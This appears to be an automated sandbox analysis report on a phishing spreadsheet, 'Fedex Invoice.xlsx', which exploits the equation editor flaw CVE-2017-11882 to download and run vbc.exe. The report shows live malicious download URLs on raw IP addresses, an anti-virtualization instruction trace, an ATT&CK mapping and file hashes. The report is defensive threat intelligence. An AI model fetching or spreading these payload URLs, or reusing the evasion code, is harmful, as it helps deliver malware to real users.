    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000459872 second address: 0000000000459872 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 1ECE1B4Fh 0x00000007 xor eax, 1DCBF7C6h 0x0000000c xor eax, 314CA14Ah 0x00000011 sub eax, 32494DC2h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FD8B8FCB1F8h 0x0000001e lfence 0x00000021 mov edx, 823F9AFEh 0x00000026 add edx, 01EEC23Dh 0x0000002c xor edx, 2B36126Dh 0x00000032 xor edx, D0E64F42h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d jmp 00007FD8B8FCB236h 0x0000003f cmp bh, ch 0x00000041 ret 0x00000042 sub edx, esi 0x00000044 ret 0x00000045 test ax, bx 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 test eax, edx 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007FD8B8FCB1D7h 0x0000005b call 00007FD8B8FCB28Bh 0x00000060 call 00007FD8B8FCB219h 0x00000065 lfence 0x00000068 mov edx, 823F9AFEh 0x0000006d add edx, 01EEC23Dh 0x00000073 xor edx, 2B36126Dh 0x00000079 xor edx, D0E64F42h 0x0000007f mov edx, dword ptr [edx] 0x00000081 lfence 0x00000084 jmp 00007FD8B8FCB236h 0x00000086 cmp bh, ch 0x00000088 ret 0x00000089 mov esi, edx 0x0000008b pushad 0x0000008c rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2560Thread sleep time: -300000s >= -30000sJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2560Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045986A rdtsc 6_2_0045986A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045986A rdtsc 6_2_0045986A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00458C21 mov eax, dword ptr fs:[00000030h]6_2_00458C21
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004544FC mov eax, dword ptr fs:[00000030h]6_2_004544FC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454515 mov eax, dword ptr fs:[00000030h]6_2_00454515
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00453D1D mov eax, dword ptr fs:[00000030h]6_2_00453D1D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004566CF mov eax, dword ptr fs:[00000030h]6_2_004566CF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045939A mov eax, dword ptr fs:[00000030h]6_2_0045939A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmpBinary or memory string: Program Manager<

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Fedex Invoice.xlsx31%VirustotalBrowse
    Fedex Invoice.xlsx28%ReversingLabsDocument-Word.Exploit.CVE-2017-11882

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\Public\vbc.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe24%VirustotalBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://37.0.11.217/KELLYREMCOS_UOuJB118.bin1%VirustotalBrowse
    http://37.0.11.217/KELLYREMCOS_UOuJB118.bin0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://212.192.246.25/rever/vbc.exe8%VirustotalBrowse
    http://212.192.246.25/rever/vbc.exe0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://37.0.11.217/KELLYREMCOS_UOuJB118.bintrue
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://212.192.246.25/rever/vbc.exetrue
    • 8%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpfalse
      high
      http://www.icra.org/vocabulary/.vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://www.day.com/dam/1.05DD04ABC.emf.0.drfalse
        high

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        212.192.246.25
        unknownRussian Federation
        205220RHC-HOSTINGGBtrue

        General Information

        Joe Sandbox Version:33.0.0 White Diamond
        Analysis ID:483375
        Start date:14.09.2021
        Start time:21:50:17
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 6m 9s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:Fedex Invoice.xlsx
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:2
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.expl.evad.winXLSX@4/21@0/1
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 4% (good quality ratio 2.3%)
        • Quality average: 36.2%
        • Quality standard deviation: 32.8%
        HCA Information:Failed
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .xlsx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        21:50:47API Interceptor29x Sleep call for process: EQNEDT32.EXE modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        212.192.246.25ORDER.xlsxGet hashmaliciousBrowse
        • 212.192.246.25/reverse/vbc.exe
        Inquiry Sheet.xlsxGet hashmaliciousBrowse
        • 212.192.246.25/excel/vbc.exe

        Domains

        No context

        ASN

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        RHC-HOSTINGGBORDER.xlsxGet hashmaliciousBrowse
        • 212.192.246.25
        Inquiry Sheet.xlsxGet hashmaliciousBrowse
        • 212.192.246.25
        01_extracted.exeGet hashmaliciousBrowse
        • 212.192.246.191
        CHECKLIST INQ 1119.vbsGet hashmaliciousBrowse
        • 212.192.246.191
        DOCU_SIGN8289292930001028839.PDF.exeGet hashmaliciousBrowse
        • 212.192.246.165
        DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
        • 212.192.246.165
        DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
        • 212.192.246.165
        DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
        • 212.192.246.165
        DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
        • 212.192.246.165
        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
        • 212.192.246.176
        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
        • 212.192.246.176
        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
        • 212.192.246.176
        53t6VeSUO5.exeGet hashmaliciousBrowse
        • 212.192.246.56
        1p34FDbhjW.exeGet hashmaliciousBrowse
        • 212.192.246.176
        eli.exeGet hashmaliciousBrowse
        • 212.192.246.242
        eli.exeGet hashmaliciousBrowse
        • 212.192.246.242
        rfq-aug-09451.exeGet hashmaliciousBrowse
        • 212.192.246.250
        Nd1eFNdNeE.exeGet hashmaliciousBrowse
        • 212.192.246.73
        J5U0QK6IhH.exeGet hashmaliciousBrowse
        • 212.192.246.147
        RF 2001466081776.docGet hashmaliciousBrowse
        • 212.192.246.147

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:downloaded
        Size (bytes):135168
        Entropy (8bit):6.633797451082329
        Encrypted:false
        SSDEEP:1536:A8N0//nCe6zBm5+JqYnViL7yQMLIn6Otq/CrAvI70qBGqdFafRo6DomgJ:TaCeWBJdVc/MLo6Ot57HdFaf5oj
        MD5:ED004FE1AA9F4FA169A05B6716C03484
        SHA1:59AF725F7F1D9582674A0236F4E41B76BBA99D83
        SHA-256:ACE5D939D3258882A6D2E2431A690EE9ED410432BFA537465A2DD9DA92441F74
        SHA-512:B52579B5A47391863BD9CD5052375C3FEFE2A104D058929A3911D552E1BF0D4EC0C30C73469713F1B0852771FCB3C206F486C06AAC4C15E561C552FD333C193E
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        • Antivirus: Virustotal, Detection: 24%, Browse
        Reputation:low
        IE Cache URL:http://212.192.246.25/rever/vbc.exe
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....VV............................p.............@..........................P..............................................$...(.......";..................................................................8... .......$............................text............................... ..`.data...dE..........................@....rsrc...";.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39BFBB29.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):49744
        Entropy (8bit):7.99056926749243
        Encrypted:true
        SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
        MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
        SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
        SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
        SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD04ABC.emf
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):648132
        Entropy (8bit):2.812211369731048
        Encrypted:false
        SSDEEP:3072:n34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:34UcLe0JOcXuunhqcS
        MD5:7BF1D75FF62365C6DAF8F6994B0808F9
        SHA1:C0154C020C48AC0B368D2EDC3FB1A3E78524015F
        SHA-256:F63F7244E9227031D9E5508D6EEF6D79FF1A563D3435B5C1854E27B74BD0A89F
        SHA-512:0BA39F8EB4CCA7131878F7477AAF6F99E77880109A7CFBB17D60809680B4BB2EFB0280DCB5F955AB6265E42958E2E74C53A653FD5E38992FACC3F34ADFC942B5
        Malicious:false
        Reputation:low
        Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...p.5..f.Y.@8.%...L.5...5.......5.t.5.RQ$[..5...5.....\.5...5.$Q$[..5...5. ...Id.Y..5...5. ............d.Y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i.............5.X.....5. .5..8.Y........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6576CE85.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):84203
        Entropy (8bit):7.979766688932294
        Encrypted:false
        SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
        MD5:208FD40D2F72D9AED77A86A44782E9E2
        SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
        SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
        SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6964C2A.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
        Category:dropped
        Size (bytes):85020
        Entropy (8bit):7.2472785111025875
        Encrypted:false
        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
        MD5:738BDB90A9D8929A5FB2D06775F3336F
        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96EA4B94.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
        Category:dropped
        Size (bytes):7006
        Entropy (8bit):7.000232770071406
        Encrypted:false
        SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
        MD5:971312D4A6C9BE9B496160215FE59C19
        SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
        SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
        SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
        Malicious:false
        Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98762820.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
        Category:dropped
        Size (bytes):14198
        Entropy (8bit):7.916688725116637
        Encrypted:false
        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
        SHA1:72CA86D260330FC32246D28349C07933E427065D
        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
        Malicious:false
        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A4FD716.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6815
        Entropy (8bit):7.871668067811304
        Encrypted:false
        SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
        MD5:E2267BEF7933F02C009EAEFC464EB83D
        SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
        SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
        SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
        Malicious:false
        Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6E6B01F.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):33795
        Entropy (8bit):7.909466841535462
        Encrypted:false
        SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
        MD5:613C306C3CC7C3367595D71BEECD5DE4
        SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
        SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
